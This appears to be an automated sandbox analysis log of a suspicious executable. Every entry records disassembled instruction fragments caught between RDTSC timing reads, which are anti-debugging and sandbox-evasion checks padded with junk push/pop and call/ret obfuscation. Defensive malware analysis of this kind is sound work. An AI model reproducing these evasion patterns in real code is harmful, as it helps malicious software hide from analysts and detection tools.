                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96C912 second address: 96C98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007FE5B8F4A746h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007FE5B8F4A757h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FE5B8F4A748h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FE5B8F4A748h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2991h] 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96C98C second address: 96C990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9708B2 second address: 9708B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971823 second address: 971828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 970AE4 second address: 970AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EE9 second address: 973EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9719E5 second address: 971A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A756h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EED second address: 973EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971A07 second address: 971A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EF3 second address: 973F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB67h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971A0B second address: 971A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 974EBC second address: 974EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9750A4 second address: 9750B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A74Bh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97761D second address: 977643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007FE5B8D9CB5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9783F1 second address: 978435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a mov ebx, dword ptr [ebp+122D191Eh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FE5B8F4A748h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov bl, ah 0x0000002e pushad 0x0000002f mov cl, B2h 0x00000031 add ecx, 2B60350Ah 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007FE5B8F4A746h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 977643 second address: 977648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A314 second address: 97A32B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007FE5B8F4A746h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A531 second address: 97A536 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97C4A3 second address: 97C530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A756h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 nop 0x00000012 or dword ptr [ebp+122DB6D9h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jne 00007FE5B8F4A749h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FE5B8F4A748h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 adc bx, AF41h 0x0000005b xchg eax, esi 0x0000005c push edi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97C530 second address: 97C543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE5B8D9CB56h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A5E7 second address: 97A605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A757h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A605 second address: 97A613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D486 second address: 97D48B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D48B second address: 97D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B553 second address: 97B5E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE5B8F4A751h 0x0000000b popad 0x0000000c nop 0x0000000d or ebx, dword ptr [ebp+122D343Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jnp 00007FE5B8F4A765h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov dword ptr [ebp+122D2C4Ah], edx 0x0000002d mov eax, dword ptr [ebp+122D0CA1h] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FE5B8F4A748h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov di, 8C4Fh 0x00000051 push FFFFFFFFh 0x00000053 sbb bx, A846h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d js 00007FE5B8F4A746h 0x00000063 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D499 second address: 97D49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B5E4 second address: 97B5F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D49D second address: 97D4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B5F3 second address: 97B5FD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D4A3 second address: 97D4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E364 second address: 97E3B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push edi 0x00000010 pushad 0x00000011 movzx ebx, dx 0x00000014 mov edx, ebx 0x00000016 popad 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jns 00007FE5B8F4A74Ch 0x0000003a push 00000000h 0x0000003c xor ebx, dword ptr [ebp+122D2885h] 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 pushad 0x00000047 popad 0x00000048 pop edi 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E3B7 second address: 97E3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FE5B8D9CB56h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E3DB second address: 97E3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98043A second address: 980444 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8D9CB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97F544 second address: 97F54E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 981350 second address: 9813B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D289Dh] 0x00000012 push 00000000h 0x00000014 jmp 00007FE5B8D9CB67h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FE5B8D9CB58h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FE5B8D9CB65h 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98388A second address: 98390A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE5B8F4A758h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FE5B8F4A74Dh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FE5B8F4A748h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D2EF7h], ebx 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D1F46h], ecx 0x0000003e push 00000000h 0x00000040 xor ebx, dword ptr [ebp+122D2829h] 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98390A second address: 98390E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98390E second address: 983914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 983B35 second address: 983B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 983B3E second address: 983BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE5B8F4A746h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d or dword ptr [ebp+124759A3h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jmp 00007FE5B8F4A74Dh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 add ebx, dword ptr [ebp+122D2AA1h] 0x0000002c mov eax, dword ptr [ebp+122D12E9h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007FE5B8F4A748h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov dword ptr [ebp+1244D562h], edi 0x00000052 push FFFFFFFFh 0x00000054 mov di, CC59h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c jmp 00007FE5B8F4A752h 0x00000061 pop esi 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 983BBE second address: 983BC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 985B73 second address: 985B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98BA46 second address: 98BA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8D9CB62h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98BA5F second address: 98BA90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A757h 0x00000007 jmp 00007FE5B8F4A752h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92665C second address: 926660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98B310 second address: 98B316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98B316 second address: 98B321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98B321 second address: 98B33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FE5B8F4A746h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99000F second address: 990014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 990014 second address: 99003C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FE5B8F4A755h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99003C second address: 990057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB67h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 990057 second address: 990093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007FE5B8F4A74Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jp 00007FE5B8F4A74Ah 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 990093 second address: 99009D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 992177 second address: 992185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE5B8F4A746h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 992185 second address: 99218C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99218C second address: 99219B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE5B8F4A746h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 997284 second address: 99728A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 995F92 second address: 995F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 995F98 second address: 995FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FE5B8D9CB5Ch 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99659F second address: 9965A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9965A5 second address: 9965B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9965B5 second address: 9965BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99689A second address: 9968AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE5B8D9CB56h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 996CE6 second address: 996CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FE5B8F4A74Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 996CFB second address: 996CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99714C second address: 997156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE5B8F4A746h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B703 second address: 99B709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B709 second address: 99B721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A754h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B85C second address: 99B860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B860 second address: 99B86A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B86A second address: 99B870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B870 second address: 99B876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99B876 second address: 99B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99C108 second address: 99C119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FE5B8F4A74Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 99C119 second address: 99C123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE5B8D9CB56h 0x0000000a rdtsc
